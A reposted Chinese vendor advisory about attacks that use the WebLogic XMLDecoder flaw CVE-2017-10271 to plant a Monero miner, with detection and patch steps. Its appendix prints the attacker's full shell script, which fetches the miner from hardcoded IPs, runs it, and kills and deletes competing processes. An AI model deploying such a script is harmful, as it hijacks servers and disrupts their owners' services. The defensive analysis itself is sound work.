警惕丨WebLogic漏洞攻击集中爆发,部委、能源、银行等政企用户需格外留意

栏目: Java · 发布时间: 6年前

内容简介:警惕丨WebLogic漏洞攻击集中爆发,部委、能源、银行等政企用户需格外留意

攻击事件概述

近日,中睿天下部署在用户处的 睿眼 设备,抓到数起黑客 利用WebLogic漏洞 对服务器发起的攻击行为,并作出 致命等级的未知威胁告警

进一步分析后, 基本确定是利用WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)攻击,拿到系统权限后,下载并执行矿机程序进行虚拟货币挖矿。

与2017年12月爆发的Weblogic漏洞挖矿事件相比,此次攻击更恶劣的是为获取更高的CPU占用率杀掉用户的非矿机进程, 从而导致用户主机宕机,严重影响正常的业务

此次攻击使用的门罗币矿机程序为XMRig,代码托管在平台GitHub。而其利用的WebLogic XMLDecoder反序列化漏洞,早在 2017 年9月睿眼就已发现针对此漏洞的攻击

目前该漏洞处于 集中爆发期 部委、银行、能源 等用户均已受到影响,大量主机失陷,预计后续会有更多的用户受到影响。

中睿天下已立刻成立应急响应小组,级别为红色。

警惕丨WebLogic漏洞攻击集中爆发,部委、能源、银行等政企用户需格外留意

睿眼 9 月告警WebLogic漏洞攻击

攻击过程分析

❖ IP 扫描:攻击者 在互联网上扫描存在 CVE-2017-10271 漏洞的机器,确定攻击目标 IP

❖  漏洞利用:攻击者对筛选出的 IP 发动攻击,利用此漏洞获得命令执行的权限

❖  矿机植入:漏洞利用成功后,会 去指定位置下载适合目标系统的挖矿 工具 进行挖矿 ,并伴随顽固启动程序。

❖  杀掉进程:挖矿程序启动后, 强行停止占用CPU过高的进程,导致业务中断。

样本分析

该命令执行脚本主要提供下载功能和杀掉主机上占用cpu高的进程。

详细分析命令执行脚本(详情见文末附录),中睿天下发现黑客主要通过构造以下几个模块顺序攻击:

 checkCmd()  // 检查操作系统

 pkill python;pkill perl; pkill $mName  // 首先杀掉所有 pythonperljava 脚本;

 downloader ()  // 提供wget、curl、python、socket四种下载方式下载矿机程序;

 runer()  // 当检测到服务器不存在挖矿程序时,立即下载挖矿程序,存为”java” ,修改为最高权限,并调起;

 killer()  // 检测到服务器中存在cpu占用超过60%,且非矿机的进程,直接杀掉;

 while 语句  //循环执行该命令;

警惕丨WebLogic漏洞攻击集中爆发,部委、能源、银行等政企用户需格外留意

「睿眼」捕获Weblogic攻击流量包

警惕丨WebLogic漏洞攻击集中爆发,部委、能源、银行等政企用户需格外留意

脚本 杀掉 」进程 下载 」矿机 程序

攻击影响范围

  • ❖  WebLogic Server 10.3.6.0.0
  • ❖  WebLogic Server 12.1.3.0.0
  • ❖  WebLogic Server 12.2.1.1.0
  • ❖  WebLogic Server 12.2.1.2.0

中睿建议

1,如何检测是否被攻击?

登录睿眼攻击溯源系统-web版,点击【威胁分析】->【全局分析】,参数搜索填写:*wls-wsal* 或 wls- 即可,HTTP状态码可搜索:!500 (状态码为500的可能为攻击成功数据包)。 (见下图)

警惕丨WebLogic漏洞攻击集中爆发,部委、能源、银行等政企用户需格外留意

睿眼 检测是否被攻击

2,发现已中招,如何处置威胁?

1 )更新补丁:

官方已发布修复补丁,建议立即排查资产并更新补丁。网址如下:

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

2 )删除组件

❖  在不影响业务的情况下,删除 WebLogic wls-wsat 应用包。

rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war

rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

❖  重启 WebLogic 服务或系统后,确认以下链接访问是否为 404

http://ip:port/wls-wsat/CoordinatorPortType11

3,本次处置后,如何针对此黑客持续监测主动防御

虽本次事件定性为恶意挖矿,但不排除黑客利用权限进行下一步渗透 。用户可在攻击溯源系统-网络版->威胁情报->配置管理->黑IP模块中添加IP,添加后睿眼可监控所有服务器和黑客IP的连接记录。

警惕丨WebLogic漏洞攻击集中爆发,部委、能源、银行等政企用户需格外留意

添加威胁情报进行持续监控

总结

相比2017年12月底发布的威胁情报预警,此次攻击的黑客团队数量扩大,攻击的规模更大,性质也更恶劣——除了下载挖矿程序外,还会丧心病狂地杀掉非矿机进程,从而导致主机宕机,影响正常的业务。

早在2017年9月,中睿天下睿眼就已发现针对此漏洞的攻击。目前该漏洞处于 集中爆发 期,「部委、银行、能源」等用户均已受到影响,大量主机中招,预计后续会有更多用户受影响。中睿天下已立刻成立应急响应小组,级别为 红色

如果您发现主机已被黑客攻击成功,或不确定主机是否存在风险,欢迎致电中睿天下技术团队寻求帮助。中睿天下将持续关注该漏洞的最新进展。

中睿天下联系电话:4008-232-911。

附录

❖  http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html 官方补丁链接

❖  https://community.oracle.com/thread/4109711 甲骨文社区关于 CVE-2017-10271 漏洞 攻击的交流互动

❖  攻击者执行命令样本:

#!/bin/sh

sPid=$$

mPid=”

mName=’java’

checkCmd() {

command -v $1 >/dev/null 2>&1

}

downloader () {

if checkCmd wget; then

wget $1 -O $2

elif checkCmd curl; then

curl $1 -o $2

elif checkCmd python; then

if [ "`python -c "import sys;print(sys.version_info[0])”`” = “3″ ]; then

python -c “from urllib.requestimport urlopen; u = urlopen(‘”$1″‘); localFile =open(‘”$2″‘, ‘wb’); localFile.write(u.read());localFile.close()”

else

python -c “from urllib importurlopen; u = urlopen(‘”$1″‘); localFile = open(‘”$2″‘,’wb’); localFile.write(u.read()); localFile.close()”

fi

else

cat < /dev/tcp/165.227.215.25/5555> $2

fi

chmod +x $2

}

killer() {

for tmpVar in `ps -aeo pid,%cpu,command |sed 1d | sort -k 2 | tail -n 10 | awk ‘{print $1}’`; do

if [ $tmpVar = $sPid ]; then

continue

fi

if [ $tmpVar = $mPid ]; then

continue

fi

if [ `ps -o %cpu $tmpVar | sed 1d | sed's/\..*//g'` -ge 60 ]; then

if [ `ps $tmpVar | sed 1d | awk'{print $5}' | grep java` ]; then

continue

fi

if [ `ps $tmpVar | sed 1d | awk'{print $5}' | grep sh` ]; then

continue

fi

if [ `ps $tmpVar | sed 1d | awk'{print $5}' | grep bash` ]; then

continue

fi

kill -9 $tmpVar

rm -f `ls -l /proc/$tmpVar/exe 2

&1 | sed ‘s/.*->//g’`

fi

done

}

runer() {

if [ -z "$mPid" ]; then

if [ ! -f $mName ]; then

downloader http://165.227.215.25/java $mName

fi

chmod +x ./$mName

./$mName

fi

mPid=`ps -eo pid,command | grep $mName |head -n 1 | awk ‘{print $1}’`

}

pkill python; pkillperl; pkill $mName

downloader http://45.77.245.237/java $mName

runer

killer

while true; do

sleep 10

if ps -p $mPid > /dev/null; then

killer

else

mPid=”

runer

fi

done


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

ACM国际大学生程序设计竞赛亚洲区预选赛真题题解

ACM国际大学生程序设计竞赛亚洲区预选赛真题题解

郭炜 / 电子工业 / 2011-7 / 49.00元

ACM国际大学生程序设计竞赛(ACM International Collegiate Programming Contest,简称ACM/ICPC)是世界上历史最悠久,规模最大、最具声望的程序设计竞赛,一直受到众多国际知名大学的重视,全球著名IT公司更是争相招募竞赛的优胜者。 该项赛事分为各大洲预选赛和全球总决赛两个阶段。北京大学多次在亚洲区预选赛中负责命题工作,是中国在ACM/ICPC命......一起来看看 《ACM国际大学生程序设计竞赛亚洲区预选赛真题题解》 这本书的介绍吧!

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

MD5 加密
MD5 加密

MD5 加密工具

html转js在线工具
html转js在线工具

html转js在线工具